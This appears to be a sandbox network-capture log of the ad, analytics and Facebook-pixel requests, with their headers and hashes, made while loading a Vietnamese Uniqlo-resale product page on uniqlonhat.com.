alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.google.no/pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO&ipr=y&prhg=0
142.250.74.163200 OK 42 B URL HTTP/2 www.google.no/pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO&ipr=y&prhg=0
IP 142.250.74.163:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /pagead/1p-conversion/952322391/?random=502172712&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&fmt=3&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&sscte=1&crd=&is_vtc=1&ocp_id=gGWLY4uACZ2bygWtz6OoCw&random=303902612&resp=GooglemKTybQhCsO&ipr=y&prhg=0 HTTP/1.1
Host: www.google.no
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://uniqlonhat.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Sat, 03 Dec 2022 15:04:32 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
content-type: image/gif
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
content-length: 42
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.facebook.com/tr/?id=729240603851497&ev=PageView&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870471&sw=1280&sh=1024&v=2.9.89&r=stable&ec=0&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET
31.13.72.36200 OK 0 B URL HTTP/2 www.facebook.com/tr/?id=729240603851497&ev=PageView&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870471&sw=1280&sh=1024&v=2.9.89&r=stable&ec=0&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET
IP 31.13.72.36:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /tr/?id=729240603851497&ev=PageView&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870471&sw=1280&sh=1024&v=2.9.89&r=stable&ec=0&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/plain
access-control-allow-origin:
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-length: 0
server: proxygen-bolt
alt-svc: h3=":443"; ma=86400
date: Sat, 03 Dec 2022 15:04:32 GMT
X-Firefox-Spdy: h2
www.facebook.com/tr/?id=729240603851497&ev=Search&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870477&sw=1280&sh=1024&v=2.9.89&r=stable&ec=2&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET
31.13.72.36200 OK 0 B URL HTTP/2 www.facebook.com/tr/?id=729240603851497&ev=Search&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870477&sw=1280&sh=1024&v=2.9.89&r=stable&ec=2&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET
IP 31.13.72.36:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /tr/?id=729240603851497&ev=Search&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870477&sw=1280&sh=1024&v=2.9.89&r=stable&ec=2&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/plain
access-control-allow-origin:
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-length: 0
server: proxygen-bolt
alt-svc: h3=":443"; ma=86400
date: Sat, 03 Dec 2022 15:04:32 GMT
X-Firefox-Spdy: h2
www.facebook.com/tr/?id=729240603851497&ev=ViewContent&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870474&sw=1280&sh=1024&v=2.9.89&r=stable&ec=1&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET
31.13.72.36200 OK 0 B URL HTTP/2 www.facebook.com/tr/?id=729240603851497&ev=ViewContent&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870474&sw=1280&sh=1024&v=2.9.89&r=stable&ec=1&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET
IP 31.13.72.36:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /tr/?id=729240603851497&ev=ViewContent&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&rl=&if=false&ts=1670079870474&sw=1280&sh=1024&v=2.9.89&r=stable&ec=1&o=30&fbp=fb.1.1670079870470.1489736831&it=1670079870154&coo=false&rqm=GET HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/plain
access-control-allow-origin:
access-control-allow-credentials: true
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-length: 0
server: proxygen-bolt
alt-svc: h3=":443"; ma=86400
date: Sat, 03 Dec 2022 15:04:32 GMT
X-Firefox-Spdy: h2
stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-26887643-3&cid=1519869217.1670079870&jid=77059531&gjid=1926687460&_gid=1271405448.1670079870&_u=IEBAAEAAAAAAACAAI~&z=1406529626
108.177.14.157200 OK 4 B URL HTTP/2 stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-26887643-3&cid=1519869217.1670079870&jid=77059531&gjid=1926687460&_gid=1271405448.1670079870&_u=IEBAAEAAAAAAACAAI~&z=1406529626
IP 108.177.14.157:0
File type ASCII text, with no line terminators
Hash 48c0473b7821185d937e685216e2168b
3743e47f8a429a5e87b86cb582d78940733d9d2e
570c4d4674fd20602189c548c145ba1f8ac34bc2e4599a71471969028aa1e25a
POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-26887643-3&cid=1519869217.1670079870&jid=77059531&gjid=1926687460&_gid=1271405448.1670079870&_u=IEBAAEAAAAAAACAAI~&z=1406529626 HTTP/1.1
Host: stats.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 0
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: http://uniqlonhat.com
strict-transport-security: max-age=10886400; includeSubDomains; preload
date: Sat, 03 Dec 2022 15:04:32 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Sun, 17 May 1998 03:00:00 GMT
access-control-allow-credentials: true
x-content-type-options: nosniff
content-type: text/plain
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 4
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 99c6e888e109cfca37de80b29e284001
3082cf79c611491ae64e5599f55e9e4908c457a6
19503ecb247142c34038b8ac5e0a5ab5bc7d94ef205beb3edde394275010e15f
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 471 B IP 142.250.74.131:0
Hash d177680f261fa0b5bf3d5ae3ed69af85
96cdc11262db0a9531fe0cd00e908f3e824c89b3
08eac8282cf4566d382816edac93db8581b65dc2898fc7ea80d7424224ed29ff
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
adservice.google.com/adsid/integrator.js?domain=uniqlonhat.com
142.250.74.162200 OK 100 B URL HTTP/2 adservice.google.com/adsid/integrator.js?domain=uniqlonhat.com
IP 142.250.74.162:0
File type ASCII text, with no line terminators
Hash 917951a58be8c6c6f3680159550ba3c2
21cd25c2a4eb9ec7e0f37021ce7b69e852dab4b4
cd8c45d9a0d98ca2e23d967483ec538bcafa246afdcf434bf60c8257acfacfac
GET /adsid/integrator.js?domain=uniqlonhat.com HTTP/1.1
Host: adservice.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
cache-control: private, no-cache, no-store
content-type: application/javascript; charset=UTF-8
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: gzip
date: Sat, 03 Dec 2022 15:04:32 GMT
server: cafe
content-length: 100
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
adservice.google.no/adsid/integrator.js?domain=uniqlonhat.com
216.58.207.226200 OK 100 B URL HTTP/2 adservice.google.no/adsid/integrator.js?domain=uniqlonhat.com
IP 216.58.207.226:0
File type ASCII text, with no line terminators
Hash 917951a58be8c6c6f3680159550ba3c2
21cd25c2a4eb9ec7e0f37021ce7b69e852dab4b4
cd8c45d9a0d98ca2e23d967483ec538bcafa246afdcf434bf60c8257acfacfac
GET /adsid/integrator.js?domain=uniqlonhat.com HTTP/1.1
Host: adservice.google.no
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
cache-control: private, no-cache, no-store
content-type: application/javascript; charset=UTF-8
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: gzip
date: Sat, 03 Dec 2022 15:04:32 GMT
server: cafe
content-length: 100
x-xss-protection: 0
alt-svc: h3="googleads.g.doubleclick.net:443"; ma=2592000,h3=":443"; ma=2592000,h3-29="googleads.g.doubleclick.net:443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="46,43",quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
partner.googleadservices.com/gampad/cookie.js?domain=uniqlonhat.com&callback=_gfp_s_&client=ca-pub-7004947269569512&gpid_exp=1
216.58.207.226200 OK 255 B URL HTTP/2 partner.googleadservices.com/gampad/cookie.js?domain=uniqlonhat.com&callback=_gfp_s_&client=ca-pub-7004947269569512&gpid_exp=1
IP 216.58.207.226:0
File type ASCII text, with very long lines (395), with no line terminators
Hash 66db3a516050884e1be2d5ce5acc89ab
213846949f802864503f957fba57d6f7e517f3a9
4b2e3f8eabc6d814dc8257a91aa8bf9347fafe3941b7da16bc32be94cd1255e0
GET /gampad/cookie.js?domain=uniqlonhat.com&callback=_gfp_s_&client=ca-pub-7004947269569512&gpid_exp=1 HTTP/1.1
Host: partner.googleadservices.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/javascript; charset=UTF-8
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: gzip
date: Sat, 03 Dec 2022 15:04:32 GMT
server: cafe
cache-control: private
content-length: 255
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7004947269569512&output=html&adk=1812271804&adf=3025194257&lmt=1670079870&plat=9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32&format=0x0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&ea=0&pra=7&wgl=1&dt=1670079870087&bpp=3&bdt=2820&idt=433&shv=r20221110&mjsv=m202211150101&ptt=9&saldr=aa&abxe=1&prev_fmts=203x600&nras=1&correlator=5967442002333&frm=20&pv=1&ga_vid=1519869217.1670079870&ga_sid=1670079871&ga_hid=275869444&ga_fc=1&u_tz=0&u_his=1&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_sd=1&adx=-12245933&ady=-12245933&biw=1268&bih=939&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759837%2C42531706%2C31071035%2C44770881%2C44774292%2C31070950&oid=2&pvsid=1622766787500943&tmod=1938675097&nvt=1&eae=2&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C1024%2C1280%2C939&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=23&ifi=2&uci=a!2&fsb=1&dtd=556
142.250.74.130200 OK 0 B URL HTTP/2 googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7004947269569512&output=html&adk=1812271804&adf=3025194257&lmt=1670079870&plat=9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32&format=0x0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&ea=0&pra=7&wgl=1&dt=1670079870087&bpp=3&bdt=2820&idt=433&shv=r20221110&mjsv=m202211150101&ptt=9&saldr=aa&abxe=1&prev_fmts=203x600&nras=1&correlator=5967442002333&frm=20&pv=1&ga_vid=1519869217.1670079870&ga_sid=1670079871&ga_hid=275869444&ga_fc=1&u_tz=0&u_his=1&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_sd=1&adx=-12245933&ady=-12245933&biw=1268&bih=939&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759837%2C42531706%2C31071035%2C44770881%2C44774292%2C31070950&oid=2&pvsid=1622766787500943&tmod=1938675097&nvt=1&eae=2&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C1024%2C1280%2C939&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=23&ifi=2&uci=a!2&fsb=1&dtd=556
IP 142.250.74.130:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /pagead/ads?client=ca-pub-7004947269569512&output=html&adk=1812271804&adf=3025194257&lmt=1670079870&plat=9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32&format=0x0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&ea=0&pra=7&wgl=1&dt=1670079870087&bpp=3&bdt=2820&idt=433&shv=r20221110&mjsv=m202211150101&ptt=9&saldr=aa&abxe=1&prev_fmts=203x600&nras=1&correlator=5967442002333&frm=20&pv=1&ga_vid=1519869217.1670079870&ga_sid=1670079871&ga_hid=275869444&ga_fc=1&u_tz=0&u_his=1&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_sd=1&adx=-12245933&ady=-12245933&biw=1268&bih=939&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759837%2C42531706%2C31071035%2C44770881%2C44774292%2C31070950&oid=2&pvsid=1622766787500943&tmod=1938675097&nvt=1&eae=2&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C1024%2C1280%2C939&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=23&ifi=2&uci=a!2&fsb=1&dtd=556 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
date: Sat, 03 Dec 2022 15:04:32 GMT
server: cafe
content-length: 0
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Sat, 03-Dec-2022 15:19:32 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Sat, 03 Dec 2022 15:04:32 GMT
cache-control: private
X-Firefox-Spdy: h2
googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7004947269569512&output=html&h=600&slotname=6743384521&adk=1598921218&adf=3812454198&pi=t.ma~as.6743384521&w=203&fwrn=4&fwrnh=100&lmt=1670079870&rafmt=1&format=203x600&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1670079870087&bpp=3&bdt=2820&idt=412&shv=r20221110&mjsv=m202211150101&ptt=9&saldr=aa&abxe=1&correlator=5967442002333&frm=20&pv=2&ga_vid=1519869217.1670079870&ga_sid=1670079871&ga_hid=275869444&ga_fc=1&u_tz=0&u_his=1&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_sd=1&adx=901&ady=1746&biw=1268&bih=939&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759837%2C42531706%2C31071035%2C44770881%2C44774292%2C31070950&oid=2&pvsid=1622766787500943&tmod=1938675097&nvt=1&eae=0&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C1024%2C1280%2C939&vis=1&rsz=%7Cm%7CpeEbr%7Cp&abl=XS&pfx=0&fu=128&bc=23&ifi=1&uci=a!1&btvi=1&fsb=1&xpc=QI8RjYK0VJ&p=http%3A//uniqlonhat.com&dtd=545
142.250.74.130200 OK 207 B URL HTTP/2 googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7004947269569512&output=html&h=600&slotname=6743384521&adk=1598921218&adf=3812454198&pi=t.ma~as.6743384521&w=203&fwrn=4&fwrnh=100&lmt=1670079870&rafmt=1&format=203x600&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&fwr=0&rpe=1&resp_fmts=4&wgl=1&dt=1670079870087&bpp=3&bdt=2820&idt=412&shv=r20221110&mjsv=m202211150101&ptt=9&saldr=aa&abxe=1&correlator=5967442002333&frm=20&pv=2&ga_vid=1519869217.1670079870&ga_sid=1670079871&ga_hid=275869444&ga_fc=1&u_tz=0&u_his=1&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_sd=1&adx=901&ady=1746&biw=1268&bih=939&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759837%2C42531706%2C31071035%2C44770881%2C44774292%2C31070950&oid=2&pvsid=1622766787500943&tmod=1938675097&nvt=1&eae=0&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C1024%2C1280%2C939&vis=1&rsz=%7Cm%7CpeEbr%7Cp&abl=XS&pfx=0&fu=128&bc=23&ifi=1&uci=a!1&btvi=1&fsb=1&xpc=QI8RjYK0VJ&p=http%3A//uniqlonhat.com&dtd=545
IP 142.250.74.130:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (430), with no line terminators
Hash 643430e3cc53c58018bc8fb8808db0c7
1f46098e8aeea769355fc270e76c26ab5765488e
210fccdd37388c5efa2ef7d3ed3c74af4f7239d1a8d1ac6d70013a6a3ce5bbf0
